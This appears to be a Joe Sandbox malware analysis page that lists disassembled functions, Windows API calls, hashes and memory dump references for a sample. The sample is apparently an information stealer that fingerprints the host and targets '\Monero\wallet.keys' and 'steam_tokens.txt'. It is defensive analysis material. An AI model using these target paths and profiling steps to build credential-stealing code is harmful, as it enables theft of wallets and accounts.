Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 8a249e9958d8e875eede70abcb6bc472e3423a08c8b086ad83c92b81dce41d14
Instruction ID: cd770369462615154b4b38316a928a75413e457cb0f141ffd422d8101aa79f7d
Opcode Fuzzy Hash: 8a249e9958d8e875eede70abcb6bc472e3423a08c8b086ad83c92b81dce41d14
Instruction Fuzzy Hash: 1F0186B1904205EBC715DF98DD45BAABBBCFB05B11F104259F645E3680C37C5904CBA2

Function 00379470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00379484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003794A5
CloseHandle.KERNEL32(00000000), ref: 003794AF

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: edebe82e5117ab86bcd8fed48d8da8cd9436fa7c62d5c9b3f2cf2fe20e4a4126
Instruction ID: ee7b7099beaefefba606dff5670e7a946f6616ac0344594fda521efb2fcd2327
Opcode Fuzzy Hash: edebe82e5117ab86bcd8fed48d8da8cd9436fa7c62d5c9b3f2cf2fe20e4a4126
Instruction Fuzzy Hash: EAF03A7490020CABDB15DFA4DC4AFEE7778EB08300F008598BA099B290D7B46E89DB91

Function 00361110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
ExitProcess.KERNEL32 ref: 00361143

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 89e382d1166b3bda79897771cbe798000f07075e2e2f71819ee5c09a7c99e609
Instruction ID: b33120269ee82f7000429170838229669dccf408ce62d5f68a8037b03a881141
Opcode Fuzzy Hash: 89e382d1166b3bda79897771cbe798000f07075e2e2f71819ee5c09a7c99e609
Instruction Fuzzy Hash: 37E08670945308FFE7506BA09C0AB0D7678EB05B01F104044F708BA1C0C7B42A04E699

Function 00371A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00377500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00377542
Part of subcall function 00377500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037757F
Part of subcall function 00377500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377603
Part of subcall function 00377500: RtlAllocateHeap.NTDLL(00000000), ref: 0037760A

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 00377690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003776A4
Part of subcall function 00377690: RtlAllocateHeap.NTDLL(00000000), ref: 003776AB

Part of subcall function 003777C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0037DBC0,000000FF,?,00371C99,00000000,?,0114D700,00000000,?), ref: 003777F2
Part of subcall function 003777C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0037DBC0,000000FF,?,00371C99,00000000,?,0114D700,00000000,?), ref: 003777F9

Part of subcall function 00377850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377880
Part of subcall function 00377850: RtlAllocateHeap.NTDLL(00000000), ref: 00377887
Part of subcall function 00377850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0037789F

Part of subcall function 003778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377910
Part of subcall function 003778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377917
Part of subcall function 003778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0037792F

Part of subcall function 00377980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E00,00000000,?), ref: 003779B0
Part of subcall function 00377980: RtlAllocateHeap.NTDLL(00000000), ref: 003779B7
Part of subcall function 00377980: GetLocalTime.KERNEL32(?,?,?,?,?,00380E00,00000000,?), ref: 003779C4
Part of subcall function 00377980: wsprintfA.USER32 ref: 003779F3

Part of subcall function 00377A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0114E3A8,00000000,?,00380E10,00000000,?,00000000,00000000), ref: 00377A63
Part of subcall function 00377A30: RtlAllocateHeap.NTDLL(00000000), ref: 00377A6A
Part of subcall function 00377A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0114E3A8,00000000,?,00380E10,00000000,?,00000000,00000000,?), ref: 00377A7D

Part of subcall function 00377B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0114E3A8,00000000,?,00380E10,00000000,?,00000000,00000000), ref: 00377B35

Part of subcall function 00377B90: GetKeyboardLayoutList.USER32(00000000,00000000,003805AF), ref: 00377BE1
Part of subcall function 00377B90: LocalAlloc.KERNEL32(00000040,?), ref: 00377BF9
Part of subcall function 00377B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00377C0D
Part of subcall function 00377B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00377C62
Part of subcall function 00377B90: LocalFree.KERNEL32(00000000), ref: 00377D22

Part of subcall function 00377D80: GetSystemPowerStatus.KERNEL32(?), ref: 00377DAD

GetCurrentProcessId.KERNEL32(00000000,?,0114D760,00000000,?,00380E24,00000000,?,00000000,00000000,?,0114E198,00000000,?,00380E20,00000000), ref: 0037207E

Part of subcall function 00379470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00379484
Part of subcall function 00379470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003794A5
Part of subcall function 00379470: CloseHandle.KERNEL32(00000000), ref: 003794AF

Part of subcall function 00377E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377E37
Part of subcall function 00377E00: RtlAllocateHeap.NTDLL(00000000), ref: 00377E3E
Part of subcall function 00377E00: RegOpenKeyExA.KERNEL32(80000002,0113BEF8,00000000,00020119,?), ref: 00377E5E
Part of subcall function 00377E00: RegQueryValueExA.KERNEL32(?,0114D900,00000000,00000000,000000FF,000000FF), ref: 00377E7F
Part of subcall function 00377E00: RegCloseKey.ADVAPI32(?), ref: 00377E92

Part of subcall function 00377F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00377FC9
Part of subcall function 00377F60: GetLastError.KERNEL32 ref: 00377FD8

Part of subcall function 00377ED0: GetSystemInfo.KERNEL32(00380E2C), ref: 00377F00
Part of subcall function 00377ED0: wsprintfA.USER32 ref: 00377F16

Part of subcall function 00378100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0114E2D0,00000000,?,00380E2C,00000000,?,00000000), ref: 00378130
Part of subcall function 00378100: RtlAllocateHeap.NTDLL(00000000), ref: 00378137
Part of subcall function 00378100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00378158
Part of subcall function 00378100: wsprintfA.USER32 ref: 003781AC

Part of subcall function 003787C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E28,00000000,?), ref: 0037882F
Part of subcall function 003787C0: RtlAllocateHeap.NTDLL(00000000), ref: 00378836
Part of subcall function 003787C0: wsprintfA.USER32 ref: 00378850

Part of subcall function 00378320: RegOpenKeyExA.KERNEL32(00000000,0114B488,00000000,00020019,00000000,003805B6), ref: 003783A4

Part of subcall function 00378320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00378426
Part of subcall function 00378320: wsprintfA.USER32 ref: 00378459
Part of subcall function 00378320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0037847B
Part of subcall function 00378320: RegCloseKey.ADVAPI32(00000000), ref: 0037848C
Part of subcall function 00378320: RegCloseKey.ADVAPI32(00000000), ref: 00378499

Part of subcall function 00378680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003805B7), ref: 003786CA
Part of subcall function 00378680: Process32First.KERNEL32(?,00000128), ref: 003786DE
Part of subcall function 00378680: Process32Next.KERNEL32(?,00000128), ref: 003786F3
Part of subcall function 00378680: CloseHandle.KERNEL32(?), ref: 00378761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0037265B

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: e4769970f26217f7fa6e47b6deef3c559e48882bf199f85670e783e38915064b
Instruction ID: 7e7cdaf976daaf0f32b6d000556458845674b9b17c7da0c4c9672e54cf05a5ae
Opcode Fuzzy Hash: e4769970f26217f7fa6e47b6deef3c559e48882bf199f85670e783e38915064b
Instruction Fuzzy Hash: 72728E71C10518BACB6BFB60DC91DDE7778AF95300F50C299B12A6A051EF342B49CF66

Function 00366D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ce5bc2ec51b55fd038f95544017a7039ac2d5b264f460cfea9b0ad47bf3551
Instruction ID: 9a99689d689eec70d508965af815ababcd218da5199687266a5021f0dff76ab8
Opcode Fuzzy Hash: e4ce5bc2ec51b55fd038f95544017a7039ac2d5b264f460cfea9b0ad47bf3551
Instruction Fuzzy Hash: A46147B4D00218EFCB15CF94E986BEEB7B4BB08344F108598E419AB284D735AF94DF91

Function 00375100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A820: lstrlen.KERNEL32(00364F05,?,?,00364F05,00380DDE), ref: 0037A82B
Part of subcall function 0037A820: lstrcpy.KERNEL32(00380DDE,00000000), ref: 0037A885

lstrlen.KERNEL32(00000000,00000000,00380ACA), ref: 0037512A

Strings

steam_tokens.txt, xrefs: 0037513F

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 4082fdff03303ef7d70597bcb36ef1d7ade82b8bda28770bc6e7285dafdaae74
Instruction ID: 6908795c7e3231dc862aa6dfbf7e53ade929196e862f3e8f34d16b5953b26b44
Opcode Fuzzy Hash: 4082fdff03303ef7d70597bcb36ef1d7ade82b8bda28770bc6e7285dafdaae74
Instruction Fuzzy Hash: A3F0317191060866DB2AF7B0DC579ED773C9F94300F408168F45B6A096EF386609D7A3

Function 00377ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00380E2C), ref: 00377F00
wsprintfA.USER32 ref: 00377F16

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
